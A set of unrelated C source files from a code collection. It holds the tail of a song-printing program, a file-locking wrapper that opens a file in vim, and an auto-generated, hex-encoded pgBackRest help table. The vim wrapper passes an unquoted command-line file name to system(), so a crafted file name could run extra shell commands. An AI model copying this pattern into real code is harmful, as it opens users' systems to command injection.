scanf("%d %d", &entradas[0], &entradas[1]);
int resultado = entradas[0] + entradas[1];
printf("%s\n", musicas[resultado]);
}
return 0;
} |
the_stack_data/215767996.c | #include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
int main(int argc, char const *argv[]) {
struct flock lock;
int fd;
if (-1 == (fd = open(argv[1], O_RDWR))) {
perror(argv[1]);
exit(1);
}
lock.l_type = F_WRLCK;
lock.l_whence = SEEK_SET;
lock.l_start = 0;
lock.l_len = 0;
if (-1 == fcntl(fd, F_SETLK, &lock)) {
if (EACCES == errno || EAGAIN == errno) {
printf("%s is locked.", argv[1]);
exit(1);
}
}
int vim_length = strlen("vim");
int arg_lenth = strlen(argv[1]);
char* command = malloc(sizeof(char) * (arg_lenth + vim_length + 2));
snprintf(command, arg_lenth + vim_length + 2, "vim %s", argv[1]);
system(command);
lock.l_type = F_UNLCK;
fcntl(fd, F_SETLK, &lock);
close(fd);
return 0;
} |
the_stack_data/93888963.c | /***********************************************************************************************************************************
Help Definition Pack
Automatically generated by Build.pm -- do not modify directly.
***********************************************************************************************************************************/
/***********************************************************************************************************************************
Command help
***********************************************************************************************************************************/
static const unsigned char helpDataPack[] =
{
// Commands
// -----------------------------------------------------------------------------------------------------------------------------
0x10, // Commands begin
// archive-get command
// -------------------------------------------------------------------------------------------------------------------------
0x79, 0x23, // Summary
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0x65, 0x78, 0x61, 0x6D, 0x70, 0x6C, 0x65, 0x2E,
// archive-push command
// -------------------------------------------------------------------------------------------------------------------------
0x79, 0x22, // Summary
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// -------------------------------------------------------------------------------------------------------------------------
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// check command
// -------------------------------------------------------------------------------------------------------------------------
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// expire command
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// help command
// -------------------------------------------------------------------------------------------------------------------------
0x79, 0x09, // Summary
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// info command
// -------------------------------------------------------------------------------------------------------------------------
0x79, 0x23, // Summary
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0x78, 0xC6, 0x16, // Description
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// repo-create command
// -------------------------------------------------------------------------------------------------------------------------
0x28, // Internal
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// repo-get command
// -------------------------------------------------------------------------------------------------------------------------
0x79, 0x1D, // Summary
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// repo-ls command
// -------------------------------------------------------------------------------------------------------------------------
0x79, 0x1B, // Summary
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// repo-put command
// -------------------------------------------------------------------------------------------------------------------------
0x28, // Internal
0x78, 0x1D, // Summary
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// repo-rm command
// -------------------------------------------------------------------------------------------------------------------------
0x28, // Internal
0x78, 0x25, // Summary
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0x78, 0xBA, 0x03, // Description
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// restore command
// -------------------------------------------------------------------------------------------------------------------------
0x79, 0x1B, // Summary
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// stanza-create command
// -------------------------------------------------------------------------------------------------------------------------
0x79, 0x20, // Summary
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// stanza-delete command
// -------------------------------------------------------------------------------------------------------------------------
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// stanza-upgrade command
// -------------------------------------------------------------------------------------------------------------------------
0x79, 0x11, // Summary
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0x78, 0xD3, 0x02, // Description
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// start command
// -------------------------------------------------------------------------------------------------------------------------
0x79, 0x22, // Summary
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0x78, 0xA2, 0x02, // Description
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// stop command
// -------------------------------------------------------------------------------------------------------------------------
0x79, 0x27, // Summary
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0x78, 0xCB, 0x02, // Description
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0x6E, 0x64, 0x20, 0x65, 0x78, 0x61, 0x6D, 0x70, 0x6C, 0x65, 0x73, 0x2E,
// verify command
// -------------------------------------------------------------------------------------------------------------------------
0x28, // Internal
0x78, 0x26, // Summary
0x56, 0x65, 0x72, 0x69, 0x66, 0x79, 0x20, 0x74, 0x68, 0x65, 0x20, 0x63, 0x6F, 0x6E, 0x74, 0x65, 0x6E, 0x74, 0x73, 0x20,
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0x78, 0x59, // Description
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0x72, 0x65, 0x20, 0x76, 0x61, 0x6C, 0x69, 0x64, 0x2E,
// version command
// -------------------------------------------------------------------------------------------------------------------------
0x79, 0x0C, // Summary
0x47, 0x65, 0x74, 0x20, 0x76, 0x65, 0x72, 0x73, 0x69, 0x6F, 0x6E, 0x2E,
0x78, 0x26, // Description
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0x00, // Commands end
// Options
// -----------------------------------------------------------------------------------------------------------------------------
0x10, // Options begin
// archive-async option
// -------------------------------------------------------------------------------------------------------------------------
0x79, 0x07, // Section
0x61, 0x72, 0x63, 0x68, 0x69, 0x76, 0x65,
0x78, 0x25, // Summary
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0x78, 0x9F, 0x02, // Description
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0x72, 0x6D, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x2E,
// archive-check option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x06, // Section
0x62, 0x61, 0x63, 0x6B, 0x75, 0x70,
0x78, 0x43, // Summary
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0x78, 0xFD, 0x01, // Description
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// archive-copy option
// -------------------------------------------------------------------------------------------------------------------------
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// archive-get-queue-max option
// -------------------------------------------------------------------------------------------------------------------------
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// archive-header-check option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x06, // Section
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// archive-mode option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x07, // Section
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// archive-timeout option
// -------------------------------------------------------------------------------------------------------------------------
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// backup-standby option
// -------------------------------------------------------------------------------------------------------------------------
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0x2E,
// buffer-size option
// -------------------------------------------------------------------------------------------------------------------------
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0x32, 0x31, 0x36, 0x2E,
// checksum-page option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x06, // Section
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// cipher-pass option
// -------------------------------------------------------------------------------------------------------------------------
0x2A, // Internal
0x78, 0x07, // Section
0x67, 0x65, 0x6E, 0x65, 0x72, 0x61, 0x6C,
0x78, 0x26, // Summary
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0x78, 0x3C, // Description
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// cmd-ssh option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x07, // Section
0x67, 0x65, 0x6E, 0x65, 0x72, 0x61, 0x6C,
0x78, 0x1E, // Summary
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// compress option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x07, // Section
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0x78, 0x15, // Summary
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0x2E,
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// compress-level option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x07, // Section
0x67, 0x65, 0x6E, 0x65, 0x72, 0x61, 0x6C,
0x78, 0x17, // Summary
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0x65, 0x6C, 0x2E,
0x78, 0xFD, 0x01, // Description
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// compress-level-network option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x07, // Section
0x67, 0x65, 0x6E, 0x65, 0x72, 0x61, 0x6C,
0x78, 0x1A, // Summary
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0x6C, 0x65, 0x76, 0x65, 0x6C, 0x2E,
0x78, 0xA6, 0x03, // Description
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0x64, 0x2E,
// compress-type option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x07, // Section
0x67, 0x65, 0x6E, 0x65, 0x72, 0x61, 0x6C,
0x78, 0x16, // Summary
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0x65, 0x2E,
0x78, 0x8D, 0x02, // Description
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0x6C, 0x61, 0x74, 0x66, 0x6F, 0x72, 0x6D, 0x73, 0x29,
// config option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x07, // Section
0x67, 0x65, 0x6E, 0x65, 0x72, 0x61, 0x6C,
0x78, 0x1E, // Summary
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0x78, 0x4B, // Description
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// config-include-path option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x07, // Section
0x67, 0x65, 0x6E, 0x65, 0x72, 0x61, 0x6C,
0x78, 0x32, // Summary
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0x78, 0xAD, 0x01, // Description
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// config-path option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x07, // Section
0x67, 0x65, 0x6E, 0x65, 0x72, 0x61, 0x6C,
0x78, 0x2C, // Summary
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0x78, 0xF9, 0x02, // Description
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// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x07, // Section
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// db-include option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x07, // Section
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// db-timeout option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x07, // Section
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// delta option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x07, // Section
0x67, 0x65, 0x6E, 0x65, 0x72, 0x61, 0x6C,
0x78, 0x22, // Summary
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0x78, 0x98, 0x02, // Description
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// dry-run option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x07, // Section
0x67, 0x65, 0x6E, 0x65, 0x72, 0x61, 0x6C,
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0x78, 0xCC, 0x01, // Description
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0x6F, 0x6E, 0x73, 0x2E,
// exclude option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x06, // Section
0x62, 0x61, 0x63, 0x6B, 0x75, 0x70,
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0x69, 0x6C, 0x65, 0x2E,
// exec-id option
// -------------------------------------------------------------------------------------------------------------------------
0x2A, // Internal
0x78, 0x07, // Section
0x67, 0x65, 0x6E, 0x65, 0x72, 0x61, 0x6C,
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0x78, 0x9E, 0x02, // Description
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// expire-auto option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x06, // Section
0x62, 0x61, 0x63, 0x6B, 0x75, 0x70,
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0x78, 0x9D, 0x02, // Description
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0x6E, 0x69, 0x6E, 0x67, 0x2E,
// filter option
// -------------------------------------------------------------------------------------------------------------------------
0x17, // Command overrides begin
0x59, 0x01, // Command repo-ls override begin
0x79, 0x28, // Summary
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0x78, 0x49, // Description
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0x2E,
0x00, // Command repo-ls override end
0x00, // Command overrides end
// force option
// -------------------------------------------------------------------------------------------------------------------------
0x15, // Command overrides begin
0x52, // Command backup override begin
0x79, 0x18, // Summary
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0x00, // Command backup override end
0x59, 0x01, // Command restore override begin
0x79, 0x10, // Summary
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0x00, // Command restore override end
0x50, // Command stanza-create override begin
0x28, // Internal
0x78, 0x16, // Summary
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0x78, 0x23, // Description
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0x00, // Command stanza-create override end
0x50, // Command stanza-delete override begin
0x79, 0x14, // Summary
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0x78, 0x82, 0x01, // Description
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0x52, // Command stop override begin
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0x00, // Command stop override end
0x00, // Command overrides end
// ignore-missing option
// -------------------------------------------------------------------------------------------------------------------------
0x15, // Command overrides begin
0x58, 0x01, // Command repo-get override begin
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0x00, // Command repo-get override end
0x00, // Command overrides end
// io-timeout option
// -------------------------------------------------------------------------------------------------------------------------
0x79, 0x07, // Section
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// job-retry option
// -------------------------------------------------------------------------------------------------------------------------
0x2A, // Internal
0x78, 0x07, // Section
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// job-retry-interval option
// -------------------------------------------------------------------------------------------------------------------------
0x2A, // Internal
0x78, 0x07, // Section
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// link-all option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x07, // Section
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// link-map option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x07, // Section
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// log-level-console option
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// log-level-file option
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// log-level-stderr option
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// log-path option
// -------------------------------------------------------------------------------------------------------------------------
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// log-subprocess option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x03, // Section
0x6C, 0x6F, 0x67,
0x78, 0x1F, // Summary
0x45, 0x6E, 0x61, 0x62, 0x6C, 0x65, 0x20, 0x6C, 0x6F, 0x67, 0x67, 0x69, 0x6E, 0x67, 0x20, 0x69, 0x6E, 0x20, 0x73, 0x75,
0x62, 0x70, 0x72, 0x6F, 0x63, 0x65, 0x73, 0x73, 0x65, 0x73, 0x2E,
0x78, 0x71, // Description
0x45, 0x6E, 0x61, 0x62, 0x6C, 0x65, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x20, 0x6C, 0x6F, 0x67, 0x67, 0x69, 0x6E, 0x67, 0x20,
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0x65, 0x76, 0x65, 0x6C, 0x20, 0x73, 0x70, 0x65, 0x63, 0x69, 0x66, 0x69, 0x65, 0x64, 0x20, 0x62, 0x79, 0x20, 0x6C, 0x6F,
0x67, 0x2D, 0x6C, 0x65, 0x76, 0x65, 0x6C, 0x2D, 0x66, 0x69, 0x6C, 0x65, 0x2E,
// log-timestamp option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x03, // Section
0x6C, 0x6F, 0x67,
0x78, 0x1C, // Summary
0x45, 0x6E, 0x61, 0x62, 0x6C, 0x65, 0x20, 0x74, 0x69, 0x6D, 0x65, 0x73, 0x74, 0x61, 0x6D, 0x70, 0x20, 0x69, 0x6E, 0x20,
0x6C, 0x6F, 0x67, 0x67, 0x69, 0x6E, 0x67, 0x2E,
0x78, 0x82, 0x01, // Description
0x45, 0x6E, 0x61, 0x62, 0x6C, 0x65, 0x73, 0x20, 0x74, 0x68, 0x65, 0x20, 0x74, 0x69, 0x6D, 0x65, 0x73, 0x74, 0x61, 0x6D,
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0x6D, 0x65, 0x6E, 0x74, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x2E,
// manifest-save-threshold option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x06, // Section
0x62, 0x61, 0x63, 0x6B, 0x75, 0x70,
0x78, 0x26, // Summary
0x4D, 0x61, 0x6E, 0x69, 0x66, 0x65, 0x73, 0x74, 0x20, 0x73, 0x61, 0x76, 0x65, 0x20, 0x74, 0x68, 0x72, 0x65, 0x73, 0x68,
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0x78, 0x81, 0x03, // Description
0x44, 0x65, 0x66, 0x69, 0x6E, 0x65, 0x73, 0x20, 0x68, 0x6F, 0x77, 0x20, 0x6F, 0x66, 0x74, 0x65, 0x6E, 0x20, 0x74, 0x68,
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0x0A,
0x53, 0x69, 0x7A, 0x65, 0x20, 0x63, 0x61, 0x6E, 0x20, 0x62, 0x65, 0x20, 0x65, 0x6E, 0x74, 0x65, 0x72, 0x65, 0x64, 0x20,
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0x72, 0x20, 0x4B, 0x42, 0x2C, 0x20, 0x4D, 0x42, 0x2C, 0x20, 0x47, 0x42, 0x2C, 0x20, 0x54, 0x42, 0x2C, 0x20, 0x6F, 0x72,
0x20, 0x50, 0x42, 0x20, 0x77, 0x68, 0x65, 0x72, 0x65, 0x20, 0x74, 0x68, 0x65, 0x20, 0x6D, 0x75, 0x6C, 0x74, 0x69, 0x70,
0x6C, 0x69, 0x65, 0x72, 0x20, 0x69, 0x73, 0x20, 0x61, 0x20, 0x70, 0x6F, 0x77, 0x65, 0x72, 0x20, 0x6F, 0x66, 0x20, 0x31,
0x30, 0x32, 0x34, 0x2E,
// neutral-umask option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x07, // Section
0x67, 0x65, 0x6E, 0x65, 0x72, 0x61, 0x6C,
0x78, 0x14, // Summary
0x55, 0x73, 0x65, 0x20, 0x61, 0x20, 0x6E, 0x65, 0x75, 0x74, 0x72, 0x61, 0x6C, 0x20, 0x75, 0x6D, 0x61, 0x73, 0x6B, 0x2E,
0x78, 0xEF, 0x02, // Description
0x53, 0x65, 0x74, 0x73, 0x20, 0x74, 0x68, 0x65, 0x20, 0x75, 0x6D, 0x61, 0x73, 0x6B, 0x20, 0x74, 0x6F, 0x20, 0x30, 0x30,
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0x64, 0x20, 0x6C, 0x69, 0x6E, 0x65, 0x2E,
// online option
// -------------------------------------------------------------------------------------------------------------------------
0x17, // Command overrides begin
0x52, // Command backup override begin
0x79, 0x19, // Summary
0x50, 0x65, 0x72, 0x66, 0x6F, 0x72, 0x6D, 0x20, 0x61, 0x6E, 0x20, 0x6F, 0x6E, 0x6C, 0x69, 0x6E, 0x65, 0x20,
0x62, 0x61, 0x63, 0x6B, 0x75, 0x70, 0x2E,
0x78, 0x86, 0x03, // Description
0x53, 0x70, 0x65, 0x63, 0x69, 0x66, 0x79, 0x69, 0x6E, 0x67, 0x20, 0x2D, 0x2D, 0x6E, 0x6F, 0x2D, 0x6F, 0x6E,
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0x00, // Command backup override end
0x5A, 0x01, // Command stanza-create override begin
0x79, 0x1C, // Summary
0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x20, 0x6F, 0x6E, 0x20, 0x61, 0x6E, 0x20, 0x6F, 0x6E, 0x6C, 0x69, 0x6E,
0x65, 0x20, 0x63, 0x6C, 0x75, 0x73, 0x74, 0x65, 0x72, 0x2E,
0x78, 0x62, // Description
0x53, 0x70, 0x65, 0x63, 0x69, 0x66, 0x79, 0x69, 0x6E, 0x67, 0x20, 0x2D, 0x2D, 0x6E, 0x6F, 0x2D, 0x6F, 0x6E,
0x6C, 0x69, 0x6E, 0x65, 0x20, 0x70, 0x72, 0x65, 0x76, 0x65, 0x6E, 0x74, 0x73, 0x20, 0x70, 0x67, 0x42, 0x61,
0x63, 0x6B, 0x52, 0x65, 0x73, 0x74, 0x20, 0x66, 0x72, 0x6F, 0x6D, 0x20, 0x63, 0x6F, 0x6E, 0x6E, 0x65, 0x63,
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0x20, 0x77, 0x68, 0x65, 0x6E, 0x20, 0x63, 0x72, 0x65, 0x61, 0x74, 0x69, 0x6E, 0x67, 0x20, 0x74, 0x68, 0x65,
0x20, 0x73, 0x74, 0x61, 0x6E, 0x7A, 0x61, 0x2E,
0x00, // Command stanza-create override end
0x51, // Command stanza-upgrade override begin
0x79, 0x19, // Summary
0x55, 0x70, 0x64, 0x61, 0x74, 0x65, 0x20, 0x61, 0x6E, 0x20, 0x6F, 0x6E, 0x6C, 0x69, 0x6E, 0x65, 0x20, 0x63,
0x6C, 0x75, 0x73, 0x74, 0x65, 0x72, 0x2E,
0x78, 0x63, // Description
0x53, 0x70, 0x65, 0x63, 0x69, 0x66, 0x79, 0x69, 0x6E, 0x67, 0x20, 0x2D, 0x2D, 0x6E, 0x6F, 0x2D, 0x6F, 0x6E,
0x6C, 0x69, 0x6E, 0x65, 0x20, 0x70, 0x72, 0x65, 0x76, 0x65, 0x6E, 0x74, 0x73, 0x20, 0x70, 0x67, 0x42, 0x61,
0x63, 0x6B, 0x52, 0x65, 0x73, 0x74, 0x20, 0x66, 0x72, 0x6F, 0x6D, 0x20, 0x63, 0x6F, 0x6E, 0x6E, 0x65, 0x63,
0x74, 0x69, 0x6E, 0x67, 0x20, 0x74, 0x6F, 0x20, 0x50, 0x6F, 0x73, 0x74, 0x67, 0x72, 0x65, 0x53, 0x51, 0x4C,
0x20, 0x77, 0x68, 0x65, 0x6E, 0x20, 0x75, 0x70, 0x67, 0x72, 0x61, 0x64, 0x69, 0x6E, 0x67, 0x20, 0x74, 0x68,
0x65, 0x20, 0x73, 0x74, 0x61, 0x6E, 0x7A, 0x61, 0x2E,
0x00, // Command stanza-upgrade override end
0x00, // Command overrides end
// output option
// -------------------------------------------------------------------------------------------------------------------------
0x15, // Command overrides begin
0x56, // Command info override begin
0x79, 0x0E, // Summary
0x4F, 0x75, 0x74, 0x70, 0x75, 0x74, 0x20, 0x66, 0x6F, 0x72, 0x6D, 0x61, 0x74, 0x2E,
0x78, 0xA9, 0x01, // Description
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0x00, // Command info override end
0x52, // Command repo-ls override begin
0x79, 0x0E, // Summary
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0x78, 0xAE, 0x03, // Description
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0x00, // Command repo-ls override end
0x00, // Command overrides end
// pg option
// -------------------------------------------------------------------------------------------------------------------------
0x28, // Internal
// pg-database option
// -------------------------------------------------------------------------------------------------------------------------
0x7E, 0x01, 0x06, // Section
0x73, 0x74, 0x61, 0x6E, 0x7A, 0x61,
0x78, 0x14, // Summary
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0x78, 0xE9, 0x01, // Description
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// pg-host option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x06, // Section
0x73, 0x74, 0x61, 0x6E, 0x7A, 0x61,
0x78, 0x2F, // Summary
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0x78, 0x51, // Description
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0x2E,
0x10, // Deprecated names begin
0x78, 0x07, // db-host
0x64, 0x62, 0x2D, 0x68, 0x6F, 0x73, 0x74,
0x00, // Deprecated names end
0x10, // Command overrides begin
0x50, // Command archive-get override begin
0x28, // Internal
0x00, // Command archive-get override end
0x50, // Command archive-push override begin
0x28, // Internal
0x00, // Command archive-push override end
0x5A, 0x01, // Command restore override begin
0x28, // Internal
0x00, // Command restore override end
0x00, // Command overrides end
// pg-host-cmd option
// -------------------------------------------------------------------------------------------------------------------------
0x79, 0x06, // Section
0x73, 0x74, 0x61, 0x6E, 0x7A, 0x61,
0x78, 0x2B, // Summary
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0x73, 0x74, 0x2E,
0x78, 0xAE, 0x01, // Description
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0x10, // Deprecated names begin
0x78, 0x06, // db-cmd
0x64, 0x62, 0x2D, 0x63, 0x6D, 0x64,
0x00, // Deprecated names end
// pg-host-config option
// -------------------------------------------------------------------------------------------------------------------------
0x7A, 0x06, // Section
0x73, 0x74, 0x61, 0x6E, 0x7A, 0x61,
0x78, 0x2C, // Summary
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0x69, 0x6C, 0x65, 0x2E,
0x78, 0xC1, 0x01, // Description
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0x10, // Deprecated names begin
0x78, 0x09, // db-config
0x64, 0x62, 0x2D, 0x63, 0x6F, 0x6E, 0x66, 0x69, 0x67,
0x00, // Deprecated names end
// pg-host-config-include-path option
// -------------------------------------------------------------------------------------------------------------------------
0x7A, 0x06, // Section
0x73, 0x74, 0x61, 0x6E, 0x7A, 0x61,
0x78, 0x34, // Summary
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0x78, 0xD9, 0x01, // Description
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// pg-host-config-path option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x06, // Section
0x73, 0x74, 0x61, 0x6E, 0x7A, 0x61,
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// pg-host-port option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x06, // Section
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0x2E,
0x78, 0x6F, // Description
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0x78, 0x0B, // db-ssh-port
0x64, 0x62, 0x2D, 0x73, 0x73, 0x68, 0x2D, 0x70, 0x6F, 0x72, 0x74,
0x00, // Deprecated names end
// pg-host-user option
// -------------------------------------------------------------------------------------------------------------------------
0x7A, 0x06, // Section
0x73, 0x74, 0x61, 0x6E, 0x7A, 0x61,
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0x10, // Deprecated names begin
0x78, 0x07, // db-user
0x64, 0x62, 0x2D, 0x75, 0x73, 0x65, 0x72,
0x00, // Deprecated names end
// pg-local option
// -------------------------------------------------------------------------------------------------------------------------
0x29, // Internal
0x78, 0x06, // Section
0x73, 0x74, 0x61, 0x6E, 0x7A, 0x61,
0x78, 0x14, // Summary
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0x2E,
// pg-path option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x06, // Section
0x73, 0x74, 0x61, 0x6E, 0x7A, 0x61,
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0x78, 0xFC, 0x02, // Description
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0x10, // Deprecated names begin
0x78, 0x07, // db-path
0x64, 0x62, 0x2D, 0x70, 0x61, 0x74, 0x68,
0x00, // Deprecated names end
// pg-port option
// -------------------------------------------------------------------------------------------------------------------------
0x7A, 0x06, // Section
0x73, 0x74, 0x61, 0x6E, 0x7A, 0x61,
0x78, 0x10, // Summary
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0x78, 0x83, 0x01, // Description
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0x10, // Deprecated names begin
0x78, 0x07, // db-port
0x64, 0x62, 0x2D, 0x70, 0x6F, 0x72, 0x74,
0x00, // Deprecated names end
// pg-socket-path option
// -------------------------------------------------------------------------------------------------------------------------
0x7A, 0x06, // Section
0x73, 0x74, 0x61, 0x6E, 0x7A, 0x61,
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0x10, // Deprecated names begin
0x78, 0x0E, // db-socket-path
0x64, 0x62, 0x2D, 0x73, 0x6F, 0x63, 0x6B, 0x65, 0x74, 0x2D, 0x70, 0x61, 0x74, 0x68,
0x00, // Deprecated names end
// pg-user option
// -------------------------------------------------------------------------------------------------------------------------
0x7A, 0x06, // Section
0x73, 0x74, 0x61, 0x6E, 0x7A, 0x61,
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// process option
// -------------------------------------------------------------------------------------------------------------------------
0x2A, // Internal
// process-max option
// -------------------------------------------------------------------------------------------------------------------------
0x7E, 0x01, 0x07, // Section
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// protocol-timeout option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x07, // Section
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// raw option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x07, // Section
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0x78, 0x16, // Summary
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// recovery-option option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x07, // Section
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// recurse option
// -------------------------------------------------------------------------------------------------------------------------
0x17, // Command overrides begin
0x59, 0x01, // Command repo-ls override begin
0x79, 0x1F, // Summary
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0x78, 0x3C, // Description
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0x75, 0x74, 0x70, 0x75, 0x74, 0x2E,
0x00, // Command repo-ls override end
0x51, // Command repo-rm override begin
0x79, 0x1A, // Summary
0x52, 0x65, 0x6D, 0x6F, 0x76, 0x65, 0x20, 0x61, 0x6C, 0x6C, 0x20, 0x73, 0x75, 0x62, 0x20, 0x66, 0x69, 0x6C,
0x65, 0x2F, 0x70, 0x61, 0x74, 0x68, 0x73, 0x2E,
0x78, 0x2D, // Description
0x41, 0x6C, 0x6C, 0x20, 0x73, 0x75, 0x62, 0x70, 0x61, 0x74, 0x68, 0x73, 0x20, 0x61, 0x6E, 0x64, 0x20, 0x74,
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0x20, 0x72, 0x65, 0x6D, 0x6F, 0x76, 0x65, 0x64, 0x2E,
0x00, // Command repo-rm override end
0x00, // Command overrides end
// remote-type option
// -------------------------------------------------------------------------------------------------------------------------
0x28, // Internal
// repo option
// -------------------------------------------------------------------------------------------------------------------------
0x7E, 0x01, 0x0A, // Section
0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79,
0x78, 0x0F, // Summary
0x53, 0x65, 0x74, 0x20, 0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79, 0x2E,
0x78, 0xAD, 0x01, // Description
0x53, 0x65, 0x74, 0x20, 0x74, 0x68, 0x65, 0x20, 0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79, 0x20, 0x66,
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0x6F, 0x6D, 0x20, 0x61, 0x20, 0x73, 0x70, 0x65, 0x63, 0x69, 0x66, 0x69, 0x63, 0x20, 0x72, 0x65, 0x70, 0x6F, 0x73, 0x69,
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0x6F, 0x73, 0x65, 0x2E,
// repo-azure-account option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x0A, // Section
0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79,
0x78, 0x19, // Summary
0x41, 0x7A, 0x75, 0x72, 0x65, 0x20, 0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79, 0x20, 0x61, 0x63, 0x63,
0x6F, 0x75, 0x6E, 0x74, 0x2E,
0x78, 0x2B, // Description
0x41, 0x7A, 0x75, 0x72, 0x65, 0x20, 0x61, 0x63, 0x63, 0x6F, 0x75, 0x6E, 0x74, 0x20, 0x75, 0x73, 0x65, 0x64, 0x20, 0x74,
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0x72, 0x79, 0x2E,
// repo-azure-container option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x0A, // Section
0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79,
0x78, 0x1B, // Summary
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0x74, 0x61, 0x69, 0x6E, 0x65, 0x72, 0x2E,
0x78, 0x8B, 0x02, // Description
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0x2C, 0x20, 0x73, 0x6F, 0x20, 0x6C, 0x6F, 0x67, 0x73, 0x20, 0x61, 0x6E, 0x64, 0x20, 0x6F, 0x74, 0x68, 0x65, 0x72, 0x20,
0x41, 0x7A, 0x75, 0x72, 0x65, 0x2D, 0x67, 0x65, 0x6E, 0x65, 0x72, 0x61, 0x74, 0x65, 0x64, 0x20, 0x63, 0x6F, 0x6E, 0x74,
0x65, 0x6E, 0x74, 0x20, 0x63, 0x61, 0x6E, 0x20, 0x61, 0x6C, 0x73, 0x6F, 0x20, 0x62, 0x65, 0x20, 0x73, 0x74, 0x6F, 0x72,
0x65, 0x64, 0x20, 0x69, 0x6E, 0x20, 0x74, 0x68, 0x65, 0x20, 0x63, 0x6F, 0x6E, 0x74, 0x61, 0x69, 0x6E, 0x65, 0x72, 0x2E,
// repo-azure-endpoint option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x0A, // Section
0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79,
0x78, 0x1A, // Summary
0x41, 0x7A, 0x75, 0x72, 0x65, 0x20, 0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79, 0x20, 0x65, 0x6E, 0x64,
0x70, 0x6F, 0x69, 0x6E, 0x74, 0x2E,
0x78, 0x96, 0x02, // Description
0x45, 0x6E, 0x64, 0x70, 0x6F, 0x69, 0x6E, 0x74, 0x20, 0x75, 0x73, 0x65, 0x64, 0x20, 0x74, 0x6F, 0x20, 0x63, 0x6F, 0x6E,
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0x6F, 0x2D, 0x73, 0x74, 0x6F, 0x72, 0x61, 0x67, 0x65, 0x2D, 0x63, 0x61, 0x2D, 0x70, 0x61, 0x74, 0x68, 0x2C, 0x20, 0x72,
0x65, 0x70, 0x6F, 0x2D, 0x73, 0x74, 0x6F, 0x72, 0x61, 0x67, 0x65, 0x2D, 0x68, 0x6F, 0x73, 0x74, 0x2C, 0x20, 0x72, 0x65,
0x70, 0x6F, 0x2D, 0x73, 0x74, 0x6F, 0x72, 0x61, 0x67, 0x65, 0x2D, 0x70, 0x6F, 0x72, 0x74, 0x2C, 0x20, 0x61, 0x6E, 0x64,
0x20, 0x72, 0x65, 0x70, 0x6F, 0x2D, 0x73, 0x74, 0x6F, 0x72, 0x61, 0x67, 0x65, 0x2D, 0x76, 0x65, 0x72, 0x69, 0x66, 0x79,
0x2D, 0x74, 0x6C, 0x73, 0x20, 0x6F, 0x70, 0x74, 0x69, 0x6F, 0x6E, 0x73, 0x20, 0x6D, 0x61, 0x79, 0x20, 0x62, 0x65, 0x20,
0x75, 0x73, 0x65, 0x66, 0x75, 0x6C, 0x2E,
// repo-azure-key option
// -------------------------------------------------------------------------------------------------------------------------
0x7B, 0x0A, // Section
0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79,
0x78, 0x15, // Summary
0x41, 0x7A, 0x75, 0x72, 0x65, 0x20, 0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79, 0x20, 0x6B, 0x65, 0x79,
0x2E,
0x78, 0x54, // Description
0x41, 0x20, 0x73, 0x68, 0x61, 0x72, 0x65, 0x64, 0x20, 0x6B, 0x65, 0x79, 0x20, 0x6F, 0x72, 0x20, 0x73, 0x68, 0x61, 0x72,
0x65, 0x64, 0x20, 0x61, 0x63, 0x63, 0x65, 0x73, 0x73, 0x20, 0x73, 0x69, 0x67, 0x6E, 0x61, 0x74, 0x75, 0x72, 0x65, 0x20,
